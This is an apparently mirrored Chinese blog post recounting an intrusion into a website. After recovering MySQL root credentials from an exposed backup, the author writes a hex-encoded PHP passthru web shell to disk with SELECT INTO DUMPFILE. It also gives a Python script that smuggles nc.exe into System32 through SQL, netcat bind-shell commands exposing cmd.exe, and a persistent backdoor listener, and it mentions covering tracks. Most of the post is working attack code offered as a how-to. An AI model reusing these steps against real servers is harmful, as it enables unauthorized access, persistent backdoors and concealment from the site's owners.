zoukankan      html  css  js  c++  java
  • 第一次渗入测试

    * 拿到网站上传权限

    发现网站有默认 3306 phpmyadmin但是不知道账号密码。

    很巧合,站长没有对site的indexes做限制,所以我可以查看他一些目录下的文件,恰巧有一份网站的备份被我下载到,得到3306的root权限。

    * 提权

    通过上传权限来提权

    DROP TABLE IF EXISTS `fm`;
    CREATE TABLE `fm` (
    `fm` longblob
    );
    insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
    select fm from fm into dumpfile 'D:\WWW\execute.php';
    drop table fm;
    flush logs;

    如此一来只要我们上传了nc.exe 就可以通过 execute.php 来执行打开一个端口。

    http://xxx.xxx.xxx.xxx/execute.php?c=nc.exe -l -p1234 -e cmd.exe

    通过脚本将nc.exe 分成多次存入数据库,依法导出到某处,附shellcode生成脚本

    fp = open('nc.exe', 'rb')
    content = fp.read()
    content = content.encode('hex')
    
    fp0 = open('nc-shellcode.sql', 'wt')
    fp0.write('''
    DROP TABLE IF EXISTS `fm`;
    CREATE TABLE `fm` (
    `fm` longblob
    );
    ''')
    
    for idx in range(len(content)/1024 + 1):
        if idx == 0:
            fp0.write('''insert into fm (fm) values (0x%s);
    '''% content[idx*1024:(idx+1)*1024])
        else:
            fp0.write('''UPDATE fm SET fm=CONCAT(fm, 0x%s);''' % content[idx*1024:(idx+1)*1024])
    fp0.write('''
    select fm from fm into dumpfile 'C:\\Windows\\System32\\nc.exe';
    drop table fm;
    flush logs;
    ''')
    

    将生成的sql执行, 生成 C:WindowsSystem32 c.exe

    访问刚刚提到的url,即可打开1234

    用nc.exe链接完成提权

    nc xxx.xxx.xxx.xxx 1234

    * 扩展留下后门,清理痕迹

    nc -L -p1235 -e cmd.exe

  • 相关阅读:
    javascript里面&&和||
    Who am I?
    Mis开发过程中的不同角色(忽略外包的情况下)
    重蹈覆辙?
    适时使用Photo Courtesy
    【LeetCode练习题】Reverse Linked List II
    【C++】大数的+-*/四则运算
    【LeetCode练习题】Multiply Strings
    【LeetCode练习题】Evaluate Reverse Polish Notation
    【LeetCode练习题】Merge k Sorted Lists
  • 原文地址:https://www.cnblogs.com/sunblackshine/p/4842080.html
Copyright © 2011-2022 走看看